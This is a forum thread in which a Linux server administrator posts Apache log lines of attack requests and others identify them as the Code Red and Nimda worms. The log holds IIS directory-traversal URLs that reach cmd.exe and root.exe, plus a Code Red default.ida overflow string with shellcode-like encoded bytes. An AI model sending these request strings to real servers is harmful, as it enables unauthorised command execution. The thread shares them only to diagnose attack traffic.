I was checking my apache logs on my Linux servers, and I'm getting the following on each of them:


785: /scripts/..%255c../winnt/system32/cmd.exe
785: /scripts/..%255c../winnt/system32/cmd.exe?/c+dir
767: /scripts/..%5c../winnt/system32/cmd.exe
767: /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
439: /scripts/root.exe
439: /scripts/root.exe?/c+dir
434: /MSADC/root.exe
434: /MSADC/root.exe?/c+dir
424: /c/winnt/system32/cmd.exe
424: /c/winnt/system32/cmd.exe?/c+dir
414: /d/winnt/system32/cmd.exe
414: /d/winnt/system32/cmd.exe?/c+dir
402: /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe
402: /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
399: /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe
399: /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
396: /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe
396: /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
394: /scripts/..%c1%1c../winnt/system32/cmd.exe
394: /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
391: /scripts/winnt/system32/cmd.exe
391: /scripts/winnt/system32/cmd.exe?/c+dir
389: /scripts/..%c0%af../winnt/system32/cmd.exe
389: /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
384: /scripts/..%c1%9c../winnt/system32/cmd.exe
384: /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
378: /scripts/..%252f../winnt/system32/cmd.exe
378: /scripts/..%252f../winnt/system32/cmd.exe?/c+dir
23: /default.ida
23: /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucb d3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a




Anyone familiar with these attacks? I've been getting them for a long time. It's really ticking me off.

Thats the Code Red worm. Nothing to worry about for Linux machines.

Here's some more info.
http://www.apacheweek.com/features/codered

I used to have a development 2k Server box that got hacked that way. I didnt have any service packs installed and I got the Nimda virus from it.

Once I installed SP2 and tried it out myself it didnt work anymore.

I tried it for myself and you can browse any drive on the server ! Scary stuff ! One of many windows security holes !

Originally posted by billyjoe
Thats the Code Red worm. Nothing to worry about for Linux machines.

Here's some more info.
http://www.apacheweek.com/features/codered

I shudder to think about the security of windoze boxes, there's a lot of code red stuff going around - Thank god for Linux I say

So nice to have peace of mind and be able to sleep :sleeping: at night..

Linux = :love:

Winblows= :puke:

None of our Windows boxes were affected by Nimda or Code Red :) So there :p

[ok, I had to say it]

Originally posted by RackMy.com
None of our Windows boxes were affected by Nimda or Code Red :) So there :p

[ok, I had to say it]

You go! :)

I read that there is a big exploit in Apache on Microsoft too, for versions prior to 1.3.24. For this one time, it's good that almost everyone is using IIS. :)